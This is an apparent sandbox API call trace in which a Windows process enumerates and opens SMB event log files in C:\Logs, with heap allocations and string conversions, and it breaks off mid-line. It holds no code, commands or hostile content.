[0072.448] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc97d66c8, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc97d66c8, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-SmbClient%4Security.evtx", cAlternateFileName="MI8CEE~1.EVT")) returned 1 [0072.448] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0072.448] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0072.448] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0072.448] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0072.448] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0072.448] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46748 [0072.448] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0072.448] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0072.448] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x716f0 [0072.448] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0072.448] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0072.448] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0072.448] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46748 | out: hHeap=0x20000) returned 1 [0072.448] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0072.448] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0072.448] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.448] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0072.448] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.448] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0072.448] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0072.448] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0072.448] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0072.448] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0072.448] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0072.448] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0072.448] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0072.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0072.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0072.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0072.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0072.449] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.449] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.449] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.449] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0072.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0072.449] AreFileApisANSI () returned 1 [0072.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx", lpUsedDefaultChar=0x0) returned 51 [0072.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0072.449] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.449] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0072.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0072.449] AreFileApisANSI () returned 1 [0072.449] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0072.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x46ac8 [0072.449] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x46ac8, cchWideChar=51 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx") returned 51 [0072.449] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4security.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0072.450] GetFileType (hFile=0x420) returned 0x1 [0072.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46ac8 | out: hHeap=0x20000) returned 1 [0072.450] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0072.450] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0072.451] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0072.451] CloseHandle (hObject=0x420) returned 1 [0072.451] AreFileApisANSI () returned 1 [0072.451] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0072.451] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x46a58 [0072.451] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x46a58, cchWideChar=51 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx") returned 51 [0072.451] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4security.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0072.451] GetFileType (hFile=0x420) returned 0x1 [0072.451] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46a58 | out: hHeap=0x20000) returned 1 [0072.451] CloseHandle (hObject=0x420) returned 1 [0072.451] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0072.451] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0072.451] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0072.451] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0072.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0072.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0072.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0072.452] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0072.452] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0072.452] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0072.452] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0072.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0072.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0072.452] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0072.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0072.452] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x716f0 [0072.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0072.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0072.452] AreFileApisANSI () returned 1 [0072.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0072.452] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x460b8 [0072.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x460b8, cchWideChar=51 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx") returned 51 [0072.452] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbclient%4security.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc97d66c8, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc97d66c8, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0072.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x460b8 | out: hHeap=0x20000) returned 1 [0072.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0072.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0072.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0072.452] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.452] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.452] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb1ea1c9, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb1ea1c9, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-SMBServer%4Audit.evtx", cAlternateFileName="MIE3AD~1.EVT")) returned 1 [0072.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0072.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0072.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0072.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69490 [0072.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0072.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45ef8 [0072.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69490 | out: hHeap=0x20000) returned 1 [0072.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0072.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0072.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0072.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0072.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0072.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45ef8 | out: hHeap=0x20000) returned 1 [0072.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0072.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0072.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0072.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0072.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0072.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0072.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0072.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0072.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0072.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0072.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0072.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0072.454] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0072.454] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0072.454] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0072.454] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0072.454] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.454] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.454] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.454] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.454] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.454] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0072.454] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0072.454] AreFileApisANSI () returned 1 [0072.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx", lpUsedDefaultChar=0x0) returned 48 [0072.454] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0072.454] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.454] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.454] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0072.454] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0072.454] AreFileApisANSI () returned 1 [0072.454] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0072.454] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0072.454] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=48 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx") returned 48 [0072.454] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4audit.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0072.454] GetFileType (hFile=0x420) returned 0x1 [0072.455] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0072.455] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0072.455] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0072.455] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0072.455] CloseHandle (hObject=0x420) returned 1 [0072.455] AreFileApisANSI () returned 1 [0072.455] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0072.455] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0072.455] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x71620, cchWideChar=48 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx") returned 48 [0072.455] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4audit.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0072.456] GetFileType (hFile=0x420) returned 0x1 [0072.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0072.456] CloseHandle (hObject=0x420) returned 1 [0072.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0072.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0072.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0072.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0072.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0072.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0072.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0072.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0072.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0072.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0072.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0072.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0072.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0072.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0072.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0072.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0072.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0072.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0072.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0072.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0072.456] AreFileApisANSI () returned 1 [0072.456] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0072.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x716f0 [0072.456] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x716f0, cchWideChar=48 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx") returned 48 [0072.456] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4audit.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb1ea1c9, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb1ea1c9, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0072.457] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0072.457] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0072.457] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0072.457] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0072.457] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.457] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.457] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb19dd19, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb19dd19, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-SMBServer%4Connectivity.evtx", cAlternateFileName="MI8248~1.EVT")) returned 1 [0072.457] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0072.457] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0072.457] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0072.457] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69210 [0072.457] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0072.457] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45e18 [0072.457] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69210 | out: hHeap=0x20000) returned 1 [0072.457] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0072.457] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 